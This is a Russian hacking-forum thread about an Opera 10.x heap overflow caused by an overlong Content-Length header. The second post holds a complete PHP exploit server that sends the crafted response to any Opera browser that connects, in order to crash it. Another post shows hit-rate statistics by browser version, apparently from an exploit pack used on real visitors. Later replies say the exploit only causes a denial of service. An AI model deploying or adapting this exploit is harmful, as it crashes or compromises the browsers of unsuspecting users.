Opera 10.x

Discussion in 'Уязвимости' started by root_sashok, 6 Mar 2010.

  1. root_sashok

    root_sashok Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    389
    Likes Received:
    573
    Reputations:
    102
    В браузере Opera версий 10.x обнаружена высокоопасная уязвимость, позволяющая удаленному пользователю скомпрометировать целевую систему, а именно аварийно завершить работу браузера или выполнить произвольный код на системе с привилегиями пользователя, запустившего браузер Opera.

    Уязвимость вызвана ошибкой переполнения буфера в результате ошибки при обработке HTTP ответов, содержащих специально сформированный HTTP заголовок Content-Length. Злоумышленник может, послав слишком длинное значение Content-Length, вызвать переполнение динамической памяти и, как следствие, выполнить произвольный код на удаленной системе с привилегиями пользователя или же аварийно завершить работу браузера.

    В настоящее время способов устранения ошибки не существует. Рекомендуется или вовсе не посещать незнакомые сайты через Opera 10.x, или же посещать, но с пониженными привилегиями.

    ©

    Любопытная тема.
     
    #1 root_sashok, 6 Mar 2010
    3 people like this.
  2. BrainDeaD

    BrainDeaD Elder - Старейшина

    Joined:
    9 Jun 2005
    Messages:
    774
    Likes Received:
    292
    Reputations:
    214
    сплоит:
    PHP:
    <?php
          if(strtolower(substr($_ENV['OS'],0,3)) == "win"define('OS','win');
      else     define('OS','nix');
         if(!    extension_loaded('php_sockets'))
         { 
            if((    OS == 'win') && (!@dl('php_sockets.dll')) ||
              ((    OS == 'nix') && (!@dl('php_sockets.so'))))
                die(    'fatal php_sockets.[dll/so] '.
                        'not loaded '."\r\n");            //.__line__.' '.__file__."\r\n");                                                   
             }
          /*Generated by my own fuzzer*/ 
          $EVIL 'HTTP/1.1 200 ok'."\r\n".
                  'Transfer-Encoding: identity'."\r\n".
                  'Date: thu 28 dec 2003 12:4:33 gmt'."\r\n".
                  'Server: moj zuy server'."\r\n".
                  'Set-Cookie: psid=d6dd02e9957fb162d2385ca6f2829a73;path=C:/'."\r\n".
                  'Content-Location: file://C:/boot.ini'."\r\n".
                  'Vary:negotiate,accept-language,accept-charset'."\r\n".
                  'Tcn: choice'."\r\n".
                  'Last-modified: sun,21 nov 2010 22:22:22 gmt'."\r\n".
                  'Etag: "3861-5c6-1b28fa80;386a-9dc-1b28fa80"'."\r\n".
                  'Accept-Ranges: bytes'."\r\n".
                  'Cache-Control: max-age=0'."\r\n".
                  'Expires: mon, 22 feb 2010 18:31:20 gmt'."\r\n".
                  'Content-Encoding: identity'."\r\n".
                  'Content-Length:9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999666'."\r\n".
                  'Via: 1.1 cache.zuo.pl:3128 (squid/2.7.stable6)'."\r\n".
                  'Keep-Alive: timeout=15, max=300'."\r\n".
                  'Connection: keep-alive'."\r\n".
                  'Content-Type: text/html; charset=iso-8859-2'."\r\n".
                  'Age: 1'."\r\n".
                  'Allow: GET,HEAD'."\r\n".
                  'Content-Disposition: inline'."\r\n".
                  'Content-MD5: Q2hlY2sgSW50ZWdyaXR5IQ=='."\r\n".
                  'Warning: 199 Miscellaneous warning'."\r\n".
                  'Trailer: Max-Forwards'."\r\n".
                  'Location: chrome://inspector/content/viewers/dom/dom.xul'."\r\n".
                  'Content-Range: bytes 21010-47021/47022'."\r\n".
                  'Content-Language: pl'."\r\n\r\n".
                  '<html><head></head><body style="background-color:red;color:white;text-align:center;"><b>seq_end</b><script>location.href="http://swswqosksqowkd";</script></body></html>';
          $buster $argc 1;
          //use -port 666 if you need
          for($i 0$i<=$buster$i+=2)
      {
          if((    '-port' == $argv[$i]) && ((int)$argv[$i 1] > 0)) $PORT $argv[$i 1];
          else     $PORT 81;
      }                                                                                                                                              
      if(!(    $SOCKET socket_create_listen($PORT)))
                     die(    'fatal socket init failed'."\r\n");
          socket_set_option($SOCKET,SOL_SOCKET,
                                    SO_RCVTIMEO,array("sec"=>3,"usec"=>0));   
      echo(    'SOCKET READY AT PORT '.$PORT."\r\n".
               'Now connect here via opera'."\r\n");                                  
      if(    $CONNECT socket_accept($SOCKET))
      {
                        $recv_buffer null;
                    echo(    'Connection ok '."\r\n");
                    if(    socket_recv($CONNECT,$recv_buffer,8,/*msg_dontwait*/MSG_WAITALL)) 
                    {
                                    if(!@    socket_write($CONNECT,$EVIL))
                                    {
                                            socket_close($CONNECT);
                                            socket_close($SOCKET);     
                                        die(    'I cant send payload !'."\r\n");
                                    }    
                    }
                    else echo(    'Something wrong with client side'."\r\n");
                        usleep(120000);
                        socket_close($CONNECT);
                        socket_close($SOCKET);                                                                
      }             
      echo(    'OK ya browser must be death now'."\r\n".
               'Have a nice day lol'."\r\n");  
    ?>
    автор: Marcin Ressel aka ~echo.
    источник: securitylab.ru
     
    #2 BrainDeaD, 6 Mar 2010
    3 people like this.
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
     Chrome 3.0	5	2	40
 Chrome 4.0	72	14	19.44
 Chrome 4.1	1	0	0
 Chrome 5.0	4	1	25
 FireFox 3.0.18	50	0	0
 FireFox 3.0.3	4	0	0
 FireFox 3.0.4	2	0	0
 FireFox 3.0.5	4	0	0
 FireFox 3.0.6	10	0	0
 FireFox 3.5.5	17	1	5.88
 FireFox 3.5.6	6	0	0
 FireFox 3.5.7	18	2	11.11
 FireFox 3.5.8	250	7	2.8
 FireFox 3.6	150	8	5.33
 MSIE 6.0	242	92	38.02
 MSIE 7.0	371	66	17.79
 MSIE 8.0	362	64	17.68
 Opera 10.00	4	0	0
 Opera 10.10	1	0	0
 Opera 8.52	1	0	0
 Opera 9.10	1	0	0
 Opera 9.20	5	0	0
 Opera 9.21	8	1	12.5
 Opera 9.22	7	2	28.57
 Opera 9.23	11	5	45.45
 Opera 9.24	4	3	75
 Opera 9.25	7	2	28.57
 Opera 9.26	8	0	0
 Opera 9.27	26	1	3.85
 Opera 9.5	1	0	0
 Opera 9.50	13	1	7.69
 Opera 9.51	21	2	9.52
 Opera 9.52	24	4	16.67
 Opera 9.60	16	2	12.5
 Opera 9.61	1	0	0
 Opera 9.62	18	1	5.56
 Opera 9.63	40	5	12.5
 Opera 9.64	82	4	4.88
 Opera 9.80	569	55	9.67
    нет неуязвимых браузеров, но осел как всегда на высоте
     
    #3 Pashkela, 6 Mar 2010
  4. root_sashok

    root_sashok Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    389
    Likes Received:
    573
    Reputations:
    102
    Что-то у Opera 9.80 сильный пробив. Не ожидал.
     
    #4 root_sashok, 6 Mar 2010
  5. BrainDeaD

    BrainDeaD Elder - Старейшина

    Joined:
    9 Jun 2005
    Messages:
    774
    Likes Received:
    292
    Reputations:
    214
    и всётаки опера по статистике самая безопасная (не считая более старые версии)
     
    #5 BrainDeaD, 6 Mar 2010
  6. root_sashok

    root_sashok Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    389
    Likes Received:
    573
    Reputations:
    102
    Официальные источники уверяют, что 10.50 уже не exploitable. Надо будет проверить, а пока — Safari.
     
    #6 root_sashok, 6 Mar 2010
  7. CardQ

    CardQ Banned

    Joined:
    27 Dec 2009
    Messages:
    5
    Likes Received:
    11
    Reputations:
    0
    Chrome 4.0 72 14 19.44
    А что за сплойт под хром?
     
    #7 CardQ, 6 Mar 2010
  8. ntldr

    ntldr Elder - Старейшина

    Joined:
    4 Dec 2007
    Messages:
    367
    Likes Received:
    140
    Reputations:
    23
    удаленный код через эту уязвимость выполнить невозможно
     
    #8 ntldr, 7 Mar 2010
  9. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    А

    пробивает?

    PS новости уже неделя где-то, они что до сих пор не залатали дырку?
     
    #9 попугай, 7 Mar 2010
  10. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    плоент не актуален - only dos + мою последнюю 10.5 build 3296 не пробило
     
    #10 darky, 7 Mar 2010
  11. root_sashok

    root_sashok Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    389
    Likes Received:
    573
    Reputations:
    102
    10.50 не пробивается, .10 пробив на ура.
     
    #11 root_sashok, 7 Mar 2010
  12. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    так напугали, что снес 10.10 и установил 10.50 :mad:
     
    _________________________
    #12 Uex Urgent, 7 Mar 2010
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.